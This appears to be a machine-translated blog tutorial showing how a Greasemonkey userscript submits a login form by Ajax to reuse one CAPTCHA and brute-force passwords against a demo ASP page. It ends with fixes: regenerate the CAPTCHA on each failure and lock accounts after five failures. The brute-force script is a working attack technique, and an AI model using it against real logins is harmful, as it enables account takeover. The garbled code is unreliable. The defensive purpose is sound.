Greasemonkey makes the website login verification code useless

Generally, in order to increase the difficulty of brute force password cracking, we add a verification code in the webpage logon box. The verification code is saved on the server side, and the client displays it with an image:

The verification code is displayed throughout the logon process: when a user opens the logon page, the server generates a verification code. After clicking logon, the server jumps to the logon page and checks whether the verification code entered by the user is correct. If the verification code is incorrect, jump back to the logon page and generate a new verification code for the user to log on again.Note: The condition for generating a new verification code is that the logon page is refreshed!

I didn't think there was any problem before. After I learned about the 12306 automatic login script today, I found that this problem was too serious. When I used greasemonkey, I could simply ignore the existence of the verification code becauseWith greasemonkey, you can use the Ajax submit form to log on to the page. This process does not refresh the logon page, so the server does not generate a new verification code. Therefore, you only need to manually enter the verification code, the script will continue to try to log on and guess the username and password!

1. Demonstration of greasemonkey Automatic Logon

To reduceCodeIn the following example, the verification code is not converted into a graph and the session is output directly. The effect is the same and the conclusion is not affected.

 

Default. asp: View code

<% @ Language = " VBScript " CodePage = " 65001 " %>
<! Doctype html Public " -// W3C // dtd xhtml 1.0 transitional // en " " Http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd " >
<HTML xmlns = " Http://www.w3.org/1999/xhtml " >
<Head>
<Meta http-equiv = " Content-Type " Content = " Text/html; charset = UTF-8 " />
<Title> logon demonstration </title>
</Head>

<Body>
<%
Randomize
Session (" Passcode " ) = Int ( 8999 * RND + 1000 ) ' Generate Verification Code
%>
<Form ID = " Form1 " Name = " Form1 " Method = " Post " Action = " Login. asp " >
Username: <input type = " Text " Name = " Txtusn " Id = " Txtusn " /> <Br/>
Password: <input type = " Text " Name = " Txtusp " Id = " Txtusp " /> <Br/>
Verification Code: <input type = " Text " Name =" Txtpasscode " Id = " Txtpasscode " /> <% = SESSION ( " Passcode " ) %> <Br/>
<Input type = " Submit " Name = " Btn1 " Id = " Btn1 " Value = " Submit " />
</Form>
</Body>
</Html> login. asp: View code

<%
Response. charset = " UTF-8 "

DimUSN, USP, code, MSG
USN = request. Form ("Txtusn")
USP = request. Form ("Txtusp")
Code = request. Form ("Txtpasscode")

Response. Write (LOGIN (USN, USP, Code ))

' Logon Function
Function Login (USN, USP, code)
If Session ( " Login " ) = True Then
Login = " Login successful. "
Else
If USN <> "" And USP <> "" Then
If Code <> CSTR (Session ( " Passcode " )) Then
Login = " Verification code error. Please enter it again. "
Exit Function
End If

If USN = " Admin " And USP = " Admin888 " Then
Session ( " Login " ) = True
Login = " Login successful. "
Else
Login = " An error occurred while using the user name or password. Please enter a new one. "
End If
Else
Login =" The user has not logged on. "
End If
End If
End Function
%> Greasemonkey script: View code

// = Userscript =
// @ Name Automatic Logon
// @ Namespace com. mzwu
// @ Include http: // localhost/default. asp
// @ Require https://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js
// ==/ Userscript =

If(Typeof($ )! = "Undefined ")
{
$ ("Body "). append ("<input type = \" button \ "name = \" btn2 \ "id = \" btn2 \ "value = \" Logon test \ "/> ");

$ ("# Btn2"). Click (Function(){
VaRUSN = "admin ";
VaRUSP = "";
VaRCode = $ ("# txtpasscode"). Val ();
VaRResponsetext = "";
VaRI = 0;

While (Responsetext. indexof ("Logon successful") =-1)
{
USP = "admin88" + (++ I ); // Password cracking
$. Ajax ({
Type: "Post ",
URL: "login. asp? R = "+ math. Random (),
Data: "txtusn =" + USN + "& txtusp =" + USP + "& txtpasscode =" + code,
Async: False ,
Success: Function (MSG ){
Responsetext = MSG;
If (Responsetext. indexof ("Logon successful ")! =-1)
{
Alert ("Logon successful. Attempts:" + I );
Location. href = "login. asp ";
}
}
});
}
});

Clearinteval (timer );
} Test results:

 

2. Solution

Two solutions are provided for reference:

Method 1: When an error occurs in the authentication username or password, the server forcibly generates a new verification code;
Method 2: If the attempt to log on fails for five times, the account will be locked for a period of time and cannot be logged on;

3. References

[1]. Firefox extension greasemonkey usage example: http://www.mzwu.com/article.asp? Id = 3091